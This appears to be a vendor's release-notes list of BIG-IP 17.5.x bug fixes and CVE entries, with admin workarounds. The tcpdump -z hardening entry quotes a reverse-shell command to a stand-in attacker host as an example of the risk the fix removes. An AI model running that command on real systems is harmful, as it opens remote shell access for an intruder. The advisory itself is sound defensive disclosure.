997169-4 : AFM rule not triggered

Links to More Info: BT997169

Component: Advanced Firewall Manager

Symptoms:
An AFM rule is not triggered when it should be.

Conditions:
-- Source and destination zone configured
-- A gateway pool is used in the route

Impact:
A firewall rule is not triggered and the default deny rule is used.

Workaround:
Alter the route to use an IP address and not a pool.

Fix:
Firewall rules are now triggered when gateway pools are used.

Fixed Versions:
17.5.1, 17.1.2, 16.1.6, 15.1.4.1

988589-11 : CVE-2019-25013 glibc vulnerability: buffer over-read in iconv

Links to More Info: K68251873, BT988589

987813-14 : CVE-2020-25643 kernel:improper input validation in the ppp_cp_parse_cr function

Links to More Info: K65234135, BT987813

985329-5 : Saving UCS takes longer and leaves temp files when iControl LX extension is installed

Links to More Info: BT985329

Component: Device Management

Symptoms:
The tmsh command 'save sys ucs' takes longer when iControl LX extensions is installed, and it may leave /shared/tmp/rpm-tmp* files.

You may see warnings that /var is full.

You may also see errors logged in /var/log/restjavad.0.log:

[WARNING][211][date and time UTC][8100/shared/iapp/build-package BuildRpmTaskCollectionWorker] Failed to execute the build command 'rpmbuild -bb --define '_tmppath /shared/tmp' --define 'main /var/config/rest/iapps/f5-service-discovery' --define '_topdir /var/config/rest/node/tmp' '/var/config/rest/node/tmp/ac891731-acb1-4832-b9f0-325e73ed1fd1.spec'', Threw:com.f5.rest.common.CommandExecuteException: Command execution process killed
        at com.f5.rest.common.ShellExecutor.finishExecution(ShellExecutor.java:281)
        at com.f5.rest.common.ShellExecutor.access$000(ShellExecutor.java:33)
        at com.f5.rest.common.ShellExecutor$1.onProcessFailed(ShellExecutor.java:320)
        at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:203)
        at java.lang.Thread.run(Thread.java:748)


Errors logged in /var/log/ltm:

err iAppsLX_save_pre: Failed to get task response within timeout for: /shared/iapp/build-package/a1724a94-fb6b-4b3e-af46-bc982567df8f
err iAppsLX_save_pre: Failed to get getRPM build response within timeout for f5-service-discovery

Conditions:
iControl LX extensions (e.g., AS3, Telemetry) are installed on the BIG-IP system.

Impact:
Saving the UCS file takes a longer time (e.g., ~1-to-2 minutes) than it does if iControl LX extensions are not installed (e.g., ~40 seconds).

/shared/tmp directory is filled with rpm-tmp* files.

Workaround:
The fix of another ID 929213 introduced a new database key iapplxrpm.timeout (default 60 seconds), which allows the RPM build timeout value to be increased.

sys db iapplxrpm.timeout {
    default-value "60"
    scf-config "true"
    value "60"
    value-range "integer min:30 max:600"
}

For example:

tmsh modify sys db iapplxrpm.timeout value 300
tmsh restart sys service restjavad

Increasing the db key and restarting restjavad should not be traffic impacting.

Fix:
Temp files under /shared/tmp is now cleaned up correctly.

Fixed Versions:
17.5.1, 17.5.0, 17.1.2, 16.1.5

981885-8 : CVE-2020-8285 curl: malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used

Links to More Info: K61186963

978613-8 : OpenSSL vulnerability CVE-2020-1971

Links to More Info: K42910051

975605-11 : CVE-2018-1122 procps-ng, procps: Local privilege escalation in top

Links to More Info: K00409335, BT975605

965545-10 : CVE-2020-27617 : QEMU Vulnerability

Links to More Info: K41142448

949509-11 : Eviction Policy UI Hardening

Component: TMOS

Symptoms:
In certain scenarios, Eviction Policy UI does not follow best security practices.

Conditions:
Eviction Policy in Use

Impact:
N/A

Workaround:
None

Fix:
Best security practices are now applied in Eviction Policy UI

Fixed Versions:
17.5.1

945421-12 : CVE-2020-1968: Raccoon vulnerability

Links to More Info: K92451315, BT945421

935769-8 : Upgrading / Rebooting BIG-IP with huge address-list configuration takes a long time★

Links to More Info: BT935769

Component: Advanced Firewall Manager

Symptoms:
Version upgrade takes more time than usual when the config contains address-lists with a lot of IP addresses. The same delay will be observed with 'tmsh load sys config' as well.

Conditions:
-- Configure address-list with 10K to 20K IP addresses or address ranges or subnets.
-- Configuration loading (e.g. Post upgrade, running tmsh load sys config, modification of the configuration and subsequent full load as in full config sync)

Impact:
Version upgrade / 'tmsh load sys config' process takes a long time than usual.

Workaround:
1) Convert continuous individual addresses in the address-lists to IP address ranges and subnets if possible.

2) Remove the huge address-lists from config before the upgrade and add back after the upgrade process is finished.

3) Upgrading to a release or EHF that contains the fix for 1209409. 1209409 does not eliminate the issue but it does reduce the time it takes to validate certain address lists.

Fixed Versions:
17.5.1.1

932461-9 : Certificate update on the SSL profile server for the HTTPS monitor: BIG-IP does not use the updated certificate.

Links to More Info: BT932461

Component: Local Traffic Manager

Symptoms:
When you overwrite the certificate that is configured on the SSL profile server and is used with the HTTPS monitor, the BIG-IP system neither uses a client certificate nor continues to use the old certificate.

After you update the certificate, the stored certificate is incremented. However, the monitor log indicates that it is using the old certificate.

Conditions:
--Create a pool with an HTTPS pool member.
--Create an HTTPS monitor with a certificate and key.
--Assign the HTTPS monitor to the HTTPS pool.
--Update the certificate through GUI or TMSH.

Impact:
The monitor tries to use the old certificate or does not present a client certificate after the update.

Workaround:
Use one of the following workarounds:

-- Restart bigd:
bigstart restart bigd

-- Modify the server SSL profile certificate key. Set it to ‘none’, and switch back to the original certificate key name.

The bigd utility successfully loads the new certificate file.

Fixed Versions:
17.5.1.1

930625-6 : TMM crash is seen due to double free in SAML flow

Links to More Info: BT930625

Component: Access Policy Manager

Symptoms:
When this issue occurs the TMM will crash

Conditions:
Exact reproduction steps are not known but it occurs during SAML transactions

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fix:
N/A

Fixed Versions:
17.5.1

926917-4 : Portal Access: unwanted decoding html entities in attribute values of HTML tags

Links to More Info: BT926917

Component: Access Policy Manager

Symptoms:
HTML Entities in Attribute values in HTML tags are decoded when they shouldn't be.

Conditions:
Portal Access is enabled

Impact:
Unwanted Application errors

Workaround:
None

Fix:
HTML entities in attribute values of HTML tags are no longer decoded by Portal Access

Fixed Versions:
17.5.1

921525-7 : CVE-2020-1752: glibc vulnerability using glob

Links to More Info: K49921213, BT921525

891333-6 : The HSB on BIG-IP platforms can get into a bad state resulting in packet corruption.

Links to More Info: K32545132, BT891333

Component: TMOS

Symptoms:
Networking connectivity issues, such as ARP resolution issues, high availability (HA) failures, health monitor instability, etc.

Packet captures with Wireshark or tshark can be used to show bit-errors/corruption in the network packet for traffic passing through the HSB. This corruption can occur in various parts of the packet such as the MAC address, EtherType, packet checksums, etc.

Conditions:
This can occur on BIG-IP hardware platforms containing a high-speed bridge (HSB).

Impact:
Network connectivity problems on some traffic passing through the affected HSB. Could be reflected in the status of Config Sync or more health monitors down on one member of HA pair.

Workaround:
Reboot the affected device.

If a reboot does not resolve the issue, then its most likely a hardware issue. Please work with Support on a RMA.

F5 has introduced a detection mechanism in newer versions of code. Please refer to the following document for more details: https://cdn.f5.com/product/bugtracker/ID1211513.html

Fix:
New FPGA firmware images are available for this issue.

Fixed Versions:
17.5.1

881065-8 : Adding port-list to Virtual Server changes the route domain to 0

Links to More Info: BT881065

Component: Local Traffic Manager

Symptoms:
When attaching the port-list to virtual server dest:port-list, the route domain of the virtual server is changed to the default value of 0, and the port-list is not correctly applied. This is encountered in the GUI but not in the CLI.

Conditions:
Using port-list along with virtual server in non default route domain using the GUI.

Impact:
You are unable to use the GUI to attach a port-list that uses a non-default route domain to a virtual server.

Workaround:
Use tmsh to attach a port-list to a virtual server if the port-list uses a non-default route domain.

Fixed Versions:
17.5.1

874521-3 : OpenSSL vulnerability: CVE-2019-1551

Links to More Info: K43798238

872109-12 : CVE-2019-17563: Tomcat Vulnerability

Links to More Info: K24551552

867253-7 : Systemd not deleting user journals

Links to More Info: BT867253

Component: TMOS

Symptoms:
When setting 'SystemMaxUse' to any value, systemd does not honor this limit, and the specified size is exceeded.

Conditions:
Using a non-TMOS user account with external authentication permission.

Note: Systemd-journald is configured to create a user journal for every remote user that logs into the BIG-IP system.

Impact:
Journald filling up the file system. These journals are allocated with a minimum size of 4MiB and are not removed when the log entries age-out.

Workaround:
Option 1:
To immediately free up space, manually remove per-user journal logs from the following location:
  /var/log/journal/*/user-*

Option 2:
To prevent the system from creating these journal files going forward:

1. Edit /etc/systemd/journald.conf and add the following at the bottom of the file:
  SplitMode=none

2. Restart systemd-journal service
  # systemctl restart systemd-journald

3. Delete the existing user journal files from /var/log
  # rm /var/log/journal/*/user-*

Note:
-- You must apply this workaround separately to each blade of a VIPRION or vCMP guest running on a VIPRION.
-- You must reapply this workaround after performing software installations.

Fixed Versions:
17.5.1

857045-6 : LDAP system authentication may stop working

Links to More Info: BT857045

Component: TMOS

Symptoms:
If the system daemon responsible for LDAP authentication crashes, the system will not automatically restart it, and remote LDAP authentication may stop working.

In /var/log/daemon.log, you may see the following:

warning systemd[1]: nslcd.service failed

Conditions:
Nslcd daemon crashed, and it fails to restart.

Impact:
System authentication stops working until nslcd is restarted.

Workaround:
Manually restart nslcd daemon:

systemctl start nslcd



nslcd can be reconfigured to restart automatically and create core files when it crashes, though these changes will be lost across software installs (and is not backed up as part of a UCS archive):

1. Run "systemctl edit nslcd", which will open a text editor (by default, nano).

2. In the text editor, add these contents:

[Service]

# Allow core files
LimitCORE=infinity
# Try to keep auth daemon running, even if it crashes
Restart=always

3. Exit the text editor and save the file

4. Check the output of "systemctl status nslcd" for any warnings/errors from systemd as a result of editing the file; there should not be any.

5. Restart nslcd:
   systemctl restart nslcd

Fixed Versions:
17.5.1, 16.1.5

811829-3 : BIG-IP as Authorization server: OAuth Report GUI display expired token as active

Links to More Info: BT811829

Component: Access Policy Manager

Symptoms:
Expired tokens status is shown as ACTIVE in the GUI whereas it is shown AS EXPIRED in the CLI via tmsh list apm oauth token-details

Conditions:
-- Access tokens/Refresh tokens should be expired

Impact:
Misleading information regarding the token status

Workaround:
Uuse 'tmsh list apm oauth token-details' but this shows only the first 100 tokens

Fix:
Made GUI changes to match the tmsh functionality

Fixed Versions:
17.5.1

798889-3 : CVE-2018-20836 kernel: race condition in smp_task_timedout() and smp_task_done() in drivers/scsi/libsas/sas_expander.c leads to use-after-free

Links to More Info: K11225249

785209-6 : CVE-2019-9074 binutils: out-of-bound read in function bfd_getl32

Links to More Info: K09092524, BT785209

765053-11 : OpenSSL vulnerability CVE-2019-1559

Links to More Info: K18549143

760895-13 : CVE-2009-5155 glibc: parse_reg_exp in posix/regcomp.c misparses alternatives leading to denial of service or trigger incorrect result

Links to More Info: K64119434, BT760895

740258-2 : Support IPv6 connections to TACACS+ remote auth servers

Links to More Info: BT740258

Component: TMOS

Symptoms:
Pam_tacplus package 1.2.9 does not support IPv6 connections to TACACS+ remote auth server

Conditions:
IPv6 connections to TACACS+ remote auth server in system-auth methods

Impact:
On a pure IPv6 network, or a network where their TACACS server is only reachable via IPv6, will not be able to use TACACS for system-auth

Workaround:
None

Fix:
NA

Fixed Versions:
17.5.1

648946-4 : Oauth server is not registered in the map for HA addresses

Links to More Info: BT648946

Component: Access Policy Manager

Symptoms:
The same loopback address is assigned to two listeners.

Conditions:
-- AAA Servers with pool.
-- OAuth Server.

Impact:
Traffic issues due loopback address that is assigned to OAuth Server, can be assigned to some other AAA Server that also uses pool.

Workaround:
None

Fixed Versions:
17.5.1

641662-1 : Always connected exclusion list does not support more than 10 entries.

Links to More Info: BT641662

Component: Access Policy Manager

Symptoms:
In locked client mode, APM provides a way to configure destinations that can still be reached by client, even in locked client mode. Number of entries is limited to 10.

Conditions:
Locked client mode is enabled

Impact:
More than 10 exclusions cannot be added

Workaround:
None

Fixed Versions:
17.5.1

634576-6 : TMM core in per-request policy

Links to More Info: K48181045, BT634576

Component: Access Policy Manager

Symptoms:
TMM might core in cases when per-request policy encounters a reject ending and the server-side flow is not available.

Conditions:
APM or SWG per-request policy with reject ending.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None.

Fix:
TMM no longer cores when per-request policy encounters reject ending.

Fixed Versions:
17.5.1, 16.1.5, 13.1.0

608745-3 : Send HOST header in OCSP responder request

Component: Access Policy Manager

Symptoms:
HOST header not sent in OCSP responder request. APM OCSP responder object uses HTTP/1.0 to send a request to the OCSP responder and HTTP/1.0 does not have a host header.

Conditions:
OCSP configuration

Impact:
APM receives an invalid response because the OCSP Server didn't know which site to send the request to due to no HOST header.

Workaround:
Create a layer virtual server listening on the IP of the ocsp server and having an irule insert the host header.
ltm rule ocsp_insert_http_host {
    when HTTP_REQUEST {
        HTTP::header insert Host <e.g. IP address>
    }
}

Fix:
HOST header added in OCSP responder request for HTTP/1.1.

Fixed Versions:
17.5.1.1

485387-2 : EncryptedAssertion may not be processed by BIG-IP as SP when EncryptedKey element is specified by RetrievalMethod Element by external IdP.

Links to More Info: BT485387

Component: Access Policy Manager

Symptoms:
An encrypted assertion from an external SAML Identity Provider (IdP) can contain the RetrievalMethod element to specify a link to the EncryptedKey element. The EncryptedKey element contains the key for decrypting the CipherData associated with an EncryptedData element.

BIG-IP configured as a Service Provider (SP) does not support the RetrievalMethod element while processing an encrypted assertion. As a result, the assertion is not processed properly, and error messages are printed to the log files: "Cannot decrypt SAML Assertion" and "failed to process encrypted assertion, error: Cipher value from EncryptedKey element not found".

Conditions:
External IdP uses RetrievalMethod to specify EncryptedKey element.

BIG-IP is configured as SP. BIG-IP requires received assertions to be encrypted.

Impact:
Authentication will fail due to inability to process assertion.

Workaround:
To work around the problem, reconfigure IdP to use embedded EncryptedKey instead of using RetrievalMethod.

Fixed Versions:
17.5.1

2017137 : pkcs11d Crash Risk Due to Unbounded Label/Password Length from MCPd

Component: Local Traffic Manager

Symptoms:
Unexpected behaviour or even a crash of pkcs11d

Conditions:
Configure the label/password values more than or equal to 32 characters.

Impact:
Configuring the label or password exceeding the allowed length, it could lead to memory corruption, unexpected behavior, or even a crash of the pkcs11d daemon.

Workaround:
Configure the values with Len 31 or below.

Fix:
The daemon now gracefully rejects inputs that exceed the length limit, logs an appropriate error, and exits the operation safely.

Fixed Versions:
17.5.1.1

1983321-1 : CVE-2025-48976 apache-commons-fileupload: Apache Commons FileUpload DoS via part headers

Links to More Info: K000152614

1983229-4 : Security exposure with -z (postrotate-command) option in tcpdump

Component: TMOS

Symptoms:
tcpdump accepts any arbitrary command as an argument to the -z option.

Example:

tcpdump -i mgmt -w trace.pcap -C 1 -z /bin/php


would execute /bin/php after file rotation.

There is no restriction on allowed commands.

Conditions:
-- Running tcpdump with the -z option on affected versions.

-- Any command, including non-compression binaries, scripts, or potentially destructive utilities, can be passed to -z.

Impact:
Arbitrary Command Execution: Any binary/script can be executed, leading to privilege escalation or system compromise.

Reverse Bash Access: A malicious user could pass a reverse shell command (e.g., bash -i >& /dev/tcp/attacker/4444 0>&1) via -z, establishing remote access to the system.

Data & System Risk: Unsafe commands could delete, modify, or exfiltrate sensitive data.

Operational Risk: Unstable post-processing commands may cause tcpdump capture rotation to fail.

Compliance Risk: Systems may fail to meet FIPS, DISA STIG, or other security standards requiring restricted command execution.

Workaround:
Do not use the -z option or use the safe post-rotate commands Eg: gzip, xz, pigz

Fix:
The -z option has been restricted to allow only safe compression utilities:

gzip, xz, pigz

Any other command provided to -z will be rejected with an error:

Unsafe command for -z option: <command>. Allowed: gzip, xz, pigz.


This prevents arbitrary command execution and eliminates the risk of reverse bash access via tcpdump -z.

Fixed Versions:
17.5.1.1

1983185-1 : REST API queries sent to BIG-IP v17.5.1 fail if they are using v17.5.0 API version★

Links to More Info: BT1983185

Component: TMOS

Symptoms:
When using REST API to issue commands to a BIG-IP system and specifying the API version to use, BIG-IP v17.5.1 does not recognize v17.5.0 as a supported version and raises an error:

"Version 17.5.0 is not supported"

This causes BIG-IQ to no longer be able to discover a BIG-IP running on 17.5.1

Conditions:
1. A REST API query is sent to a BIG-IP v17.5.1 system
2. This REST API query uses v17.5.0 API version by including 'ver=17.5.0' in the query string.

Impact:
Any REST API query sent to a BIG-IP v17.5.1 fails if it has 'ver=17.5.0' in the query string. This leads to an unreliable REST API on BIG-IP v17.5.1.

One such business impact is that BIG-IPs become unmanageable from BIG-IQs as the REST API queries are still using v17.5.0 API version in them.

Workaround:
When sending a REST API query to BIG-IP v17.5.1, use a different available API version other than v17.5.0.

For ex. Instead of 'ver=17.5.0', use 'ver=17.1.1'.
restcurl -u admin "/tm/sys/provision/urldb?ver=17.5.0"
restcurl -u admin "/tm/sys/provision/urldb?ver=17.1.1"

Fix:
BIG-IP v17.5.1 now recognizes v17.5.0 as a supported version in the context of REST API commands

Fixed Versions:
17.5.1.1

1966729-1 : Endpoint inspection not working with chrome browser

Component: Access Policy Manager

Symptoms:
Endpoint inspection may not start when virtual server is accessed from Chrome browser of MacOS. When refreshed it may work properly.

Also client-type agent in access policy incorrectly detects MacOS as win11.

Conditions:
-- User accesses virtual server via a Chrome browser on MacOS.
-- Access policy has "client os" agent in VPE.

Impact:
Server incorrectly detects client platform macOS as win11

Workaround:
When HTTP_REQUEST {

if {[HTTP::uri] equals "/my.policy"} {
if {[HTTP::header exists "Sec-CH-UA-Platform-Version"] && [HTTP::header exists "Sec-CH-UA-Platform"]} {
set platform [string tolower [HTTP::header value "Sec-CH-UA-Platform"]]
set platform [string tolower [string trim [string map {＼" ""} $platform]]]
if { $platform ne "windows" } {
         HTTP::header remove "Sec-CH-UA-Platform-Version"
         log local0. "Removing header $platform"
}
}
}
}

when CLIENT_ACCEPTED {
    ACCESS::restrict_irule_events disable
}

Fix:
Server should detect platform correctly if client is using macOS.

Fixed Versions:
17.5.1.1

1965849-1 : [APM] TMM core is observed in validating the saml assertion signature

Links to More Info: BT1965849

Component: Access Policy Manager

Symptoms:
In SAML assertion signature validation, there is an error scenario where a macro in the defined log expects multiple arguments, which have been incorrectly passed.

Conditions:
SAML SP is configured with
- Invalid certificates.
- Or incorrect permission for certificates.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
SAML is configured with proper certificates with proper permissions.

Fixed Versions:
17.5.1.1

1965053-1 : Keymgmtd: Incorrect and misleading debug log statements

Links to More Info: BT1965053

Component: TMOS

Symptoms:
A few debug log statements in the keymgmtd daemon are inaccurate or misleading, resulting in confusion and difficulty when troubleshooting production issues.

Conditions:
Reviewing keymgmtd logs

Impact:
Misleading debug log messages

Workaround:
None

Fix:
Fixed misleading log messages

Fixed Versions:
17.5.1.1

1962785-3 : Monitors of type snmp_link can fail

Component: Global Traffic Manager (DNS)

Symptoms:
Monitors of type snmp_link can fail as they may not be added to the active probe list.

Conditions:
Use of monitor type snmp_link.

Impact:
Availability status may be shown in red.

Workaround:
None

Fix:
Removed the condition check for adding Monitors to the active probe list.

Fixed Versions:
17.5.1.1

1952729-1 : Certificates with explicitly defined EC parameters are treated as invalid in Common Criteria mode and TLS communication will be rejected.

Links to More Info: BT1952729

Component: TMOS

Symptoms:
In Common Criteria mode, BIG-IP accepts certificates with explicit EC parameters

Conditions:
1. BIG-IP is in Common Criteria (Common Criteria) mode
2. BIG-IP has ECC certificates as a Server and/or Clients/Servers interacting with BIG-IP sending ECC certificates with Explicit EC params.

Impact:
In Common Criteria mode, BIG-IP accepts certificates with explicit EC parameters and TLS connection is successful.

Workaround:
None

Fix:
Added fix to reject certificates with explicit defined EC params by BIG-IP.

Fixed Versions:
17.5.1.1

1952657-1 : In FIPS-CC mode ECC Certificates with explicitly defined EC parameters are accepted

Links to More Info: BT1952657

Component: Local Traffic Manager

Symptoms:
BIG-IP accepts certificates with explicit EC parameters enabled while importing and handshakes will be successful.

Conditions:
1. BIG-IP is in CC (Common Criteria) mode
2. BIG-IP has ECC certificates as a Server and/or Clients/Servers interacting with BIG-IP sending ECC certificates with Explicit EC params

Impact:
BIG-IP improperly imports certificates with explicitly-defined EC params when running in Common Criteria mode.

Workaround:
None

Fix:
Added fix to reject certificates with explicit defined ec params by BIG-IP while importing

Fixed Versions:
17.5.1.1

1937817-4 : CVE-2025-54500: A Particular HTTP/2 sequence may cause High CPU utilization [MadeYouReset]

Links to More Info: K000152001

1937777-1 : The client can resume a TLS session using psk_ke mode in the psk_key_exchange_modes extension.

Links to More Info: BT1937777

Component: Local Traffic Manager

Symptoms:
In TLS, the psk_key_exchange_modes extension in the Client Hello specifies the supported key exchange modes for resuming sessions with pre-shared keys (PSK).
As per Common Criteria guidelines, if client hello contains only psk_ke mode in the "psk_key_exchange_modes" extension then TLS handshake either (1) implicitly rejects the session ticket by performing a full handshake, or (2) terminates the TLS handshake to prevent the flow of application data.

Conditions:
In ClientHello, only psk_ke mode should be present in the "psk_key_exchange_modes" extension.
ClientHello should contain "pre_shared_key" extension too.

Impact:
TLS handshake will be successful with this configuration.

Workaround:
None

Fix:
Updated the code to perform full handshake if psk_ke mode present in the "psk_key_exchange_modes" extension.

Fixed Versions:
17.5.1.1

1936421-2 : Core generated for autodosd daemon when synchronization process is terminated

Links to More Info: BT1936421

Component: Advanced Firewall Manager

Symptoms:
Autodosd cores on SIGSEGV.

Conditions:
-- AFM DoS vectors configured
-- This can occur during normal operation but the specific conditions that trigger it are unknown

Impact:
Autodosd is restarted, but up to 15 seconds of history may be lost.

Workaround:
None

Fix:
Fixed an autodosd crash.

Fixed Versions:
17.5.1

1936233-1 : TMM mismanagement of IPsec connections can slowly leak memory and cause tunnel negotiation to fail

Links to More Info: BT1936233

Component: TMOS

Symptoms:
-- The BIG-IP cannot setup a specific IPsec tunnel.
-- The BIG-IP may eventually run out of memory, or core

Conditions:
-- IPsec IKEv2
-- Tunnel config changes, or tunnel never works from initial setup

Impact:
-- TMM may run out of memory after a very long time
-- TMM may core due to the leaked connections

Workaround:
None

Fix:
The connection leak will not happen.

Fixed Versions:
17.5.1.1

1935833-2 : Tmm cores with "ERR: Attempting to send MPI message to ourself"

Links to More Info: BT1935833

Component: TMOS

Symptoms:
A TMM crash occurs, tmm_assert is triggered if an MPI message is sent to the same TMM (self).

Conditions:
New IPsec tunnel configured or deleted and High Availability config sync is started.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None.

Fix:
The crash no longer occurs.

Fixed Versions:
17.5.1.1

1934865-1 : Remove multiple redundant entries for port-list objects in configuration file

Links to More Info: BT1934865

Component: Advanced Firewall Manager

Symptoms:
When a port-list object is created using one of the following TMSH CLIs (tmsh create net port-list, tmsh create security firewall port-list, or tmsh create security shared-objects port-list), redundant entries for the same object are generated in the configuration file under three contexts:

net port-list
security firewall port-list
security shared-objects port-list
For example, a port-list created using one CLI results in multiple entries referring to the same schema object, such as:
net port-list /Common/portListExample {
    ports {
        80 { }
        443 { }
    }
}

security shared-objects port-list /Common/portListExample {
    ports {
        80 { }
        443 { }
    }
}


security firewall port-list /Common/portListExample {
    ports {
        80 { }
        443 { }
    }
}

This behaviour causes unnecessary duplication in the configuration file.

Conditions:
Redundant entries occur in the configuration file when:
A port-list object is created using any one of the following TMSH CLIs:
1. tmsh create net port-list
2. tmsh create security firewall port-list
3. tmsh create security shared-objects port-list
All three CLI commands point to the same object and record three separate entries in the configuration file.

Impact:
Redundant entries in the configuration file lead to:
1. Increased configuration file size unnecessarily.
2. Risk of user confusion during manual editing or review of configuration files.

This issue does not impact runtime functionality or object behaviour, but it introduces maintenance overhead when users interact with their configurations.

Workaround:
None

Fixed Versions:
17.5.1

1934781-2 : In FIPS-CC mode ECC Certificates with explicitly defined EC parameters are accepted

Links to More Info: BT1934781

Component: Local Traffic Manager

Symptoms:
BIG-IP accepts certificates with explicit EC parameters enabled and handshakes will be successful.

Conditions:
1. BIG-IP is in CC (Common Criteria) mode
2. BIG-IP has ECC certificates as a Server and/or Clients/Servers interacting with BIG-IP sending ECC certificates with Explicit EC params

Impact:
BIG-IP improperly accepts certificates with explicitly-defined EC params when running in Common Criteria mode.

Workaround:
None

Fix:
Added fix to reject certificates with explicit defined ec params by BIG-IP

Fixed Versions:
17.5.1.1

1934513-2 : Redefinition of xlink namespace leads to 'malformed document' violation

Component: Application Security Manager

Symptoms:
An unexpected 'malformed document' violation is seen

Conditions:
- XML schema with redefined xlink namespace is set
- Request contains redefined xlink namespace

Impact:
False positive

Workaround:
None

Fix:
Redefinition of xlink namespace can be enabled through setting ASM internal variable 'allowXLINKRename' to 1

Fixed Versions:
17.5.1.1

1934493-2 : BIG-IP SFTP hardening

Component: TMOS

Symptoms:
Under certain conditions SFTP does not follow current best practices.

Conditions:
- Authenticated high-privilege user
- SFTP file transfer

Impact:
BIG-IP does not follow best practices for sftp operations

Workaround:
N/A

Fix:
The SFTP file transfer now follows current best practices.

Fixed Versions:
17.5.1

1934401-1 : iSeries HSB v5.26.8.0 firmware

Links to More Info: BT1934401

Component: TMOS

Symptoms:
iSeries HSB v5.26.8.0 firmware

Conditions:
iSeries i11000 series appliance

Impact:
Not applicable.

Workaround:
Not applicable.

Fix:
Fixes HSB bit-flip issues. See ID891333 for more information.

Fixed Versions:
17.5.1

1934393-1 : iSeries HSB v5.9.14.0 firmware

Links to More Info: BT1934393

Component: TMOS

Symptoms:
iSeries HSB v5.9.14.0 firmware

Conditions:
iSeries i5000, i7000, or i10000 series appliance

Impact:
Not applicable.

Workaround:
Not applicable.

Fix:
Fixes HSB bit-flip issues. See ID891333 for more information.

Fixed Versions:
17.5.1

1934385-1 : iSeries HSB v4.3.5.0 firmware

Links to More Info: BT1934385

Component: TMOS

Symptoms:
iSeries HSB v4.3.5.0 firmware

Conditions:
iSeries i2000 or i4000 series appliance

Impact:
Not applicable.

Workaround:
Not applicable.

Fix:
Fixes HSB bit-flip issues. See ID891333 for more information.

Fixed Versions:
17.5.1

1930945 : [APM][KERBEROS][NTLM FALLBACK] Kerberos Authentication fails post-upgrade to v17.5.0/v17.5.1 — “Profile '/Common/kerberos_auth_config_default' was not found” and ECA Crashes★

Links to More Info: BT1930945

Component: Access Policy Manager

Symptoms:
1.ECA process continuously restarts (SIGSEGV/crash).

2. /var/log/apm contains errors indicating missing Kerberos config and NTLM fallback.

Conditions:
1. kerberos usecase

Impact:
1. Kerberos authentication fails, leading to unsuccessful proxy access for domain-joined users.

Workaround:
None

Fixed Versions:
17.5.1

1928749-2 : TMM cores in rare circumstances

Links to More Info: BT1928749

Component: TMOS

Symptoms:
TMM cores in rare circumstances

Conditions:
Can occur after High Availability (HA) failover.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fix:
TMM crash prevented.

Fixed Versions:
17.5.1.1

1928537-1 : Missing initial PKCS11d login state causes login failures on certain AWS CloudHSMs

Links to More Info: BT1928537

Component: Local Traffic Manager

Symptoms:
The PKCS11d daemon did not properly initialize the login state for each partition. It was previously assumed that a user was effectively “logged in” on startup, even though no explicit state indicated CKR_USER_NOT_LOGGED_IN.

This worked with older HSMs and earlier AWS CloudHSM SDK3 primarily because those libraries did not strictly require an explicit CKR_USER_NOT_LOGGED_IN state; they would either auto-login or return CKR_USER_ALREADY_LOGGED_IN in most cases.

However, newer AWS CloudHSM libraries (SDK5) and other current HSM vendors require a proper indication that the user is not logged in to handle re-login flows correctly.

Conditions:
Use SDK version 5 with BIG-IP.

Impact:
Key creation fails.

Workaround:
None

Fix:
- This fix is applied to all HSMs, not just AWS CloudHSM. Each partition starts in a well-defined, “not logged in” state. It only transitions to CKR_OK or CKR_USER_ALREADY_LOGGED_IN when the device confirms the user is authenticated.

- The change sets the hsm_partitions.array[slot].login_status = CKR_USER_NOT_LOGGED_IN during session/partition initialization.

Fixed Versions:
17.5.1

1927513-1 : SIGSEGV TMM core ikev2_encrypt_packet_construct at iked/ikev2_packet.c:334

Component: TMOS

Symptoms:
Crashes after many failovers when upgraded from 15.1.x to 17.1.x version.

Conditions:
Failover

Impact:
Crash and tmm restartsTraffic is disrupted when tmm restarts.

Fix:
Use sys-db variable "ipsec.removeredundantsa" to avoid the crash.

Fixed Versions:
17.5.1.1

1927225-2 : Vertical tab (u000b) is removed from the request by the JSON parser

Links to More Info: BT1927225

Component: Application Security Manager

Symptoms:
The JSON parser removes the vertical tab (＼u00b) from the request, preventing attack signatures from matching and causing the request to be bypassed.

Conditions:
Attaching the JSON profile, send a request with a vertical tab (＼u000b).

Impact:
Attack signatures are not matched to the SQL injection attack vector.

Workaround:
None

Fixed Versions:
17.5.1.1

1926989-1 : BIG-IP Virtual Edition: kswapd running constantly and consuming most of the CPU cycles of a core★

Links to More Info: BT1926989

Component: TMOS

Symptoms:
After a new installation or after an upgrade to of a Virtual Edition to one of the affected versions, the 'kswapd' daemon runs constantly, consuming up to 100% of the cycles of a CPU core.

Swap use may be higher after upgrade.

Conditions:
- installation of a new BIG-IP Virtual Edition

or

- upgrade of a BIG-IP Virtual Edition to one of the affected versions

Impact:
A CPU core constantly consuming most of its CPU cycles.
General slowness of the system.

Swap use may be higher after upgrade.

Workaround:
If the problem is present after a TMOS upgrade:
- check what was the value of vm.min_free_kbytes before the upgrade by booting back in the previous volume
- set the same value in the new volume with the command:

# sysctl -w vm.min_free_kbytes=<VALUE>

No reboot or tmm restart is needed.




If the Virtual Edition is a fresh install:

- set the vm.min_free_kbytes value to 24141

# sysctl -w vm.min_free_kbytes=24141

No reboot or tmm restart is needed.

You may need to follow the "Additional Information" section in https://my.f5.com/manage/s/article/K000150960 to ensure that the changes persist after a reboot.

Fix:
Vm.min_free_kbytes is given the correct value.

Fixed Versions:
17.5.1

1926885 : [APM] URL DB mismatch error for Religion categories in the upgrade★

Links to More Info: BT1926885

Component: Access Policy Manager

Symptoms:
Error messages in /var/log/apm

"The requested URL Category (/Common/Lesser-Known_Religions) was not found."
"The requested URL Category (/Common/Widely-Known_Religions) was not found."

Conditions:
APM provisions and SWG database downloads enabled.

Impact:
Upgrades fails with below error:

There were warnings:
Category name changed from /Common/Lesser_Known_Religions to in allowed categories of url filter /Common/test_filter
Category name changed from /Common/Widely_Known_Religions to in allowed categories of url filter /Common/test_filter
Compliance '/Common/gtp_unknown_tunnel_id' is deprecated and removed from '/Common/protocol_inspection'.
Compliance '/Common/smtp_command_length_overflow' is deprecated and removed from '/Common/protocol_inspection'.
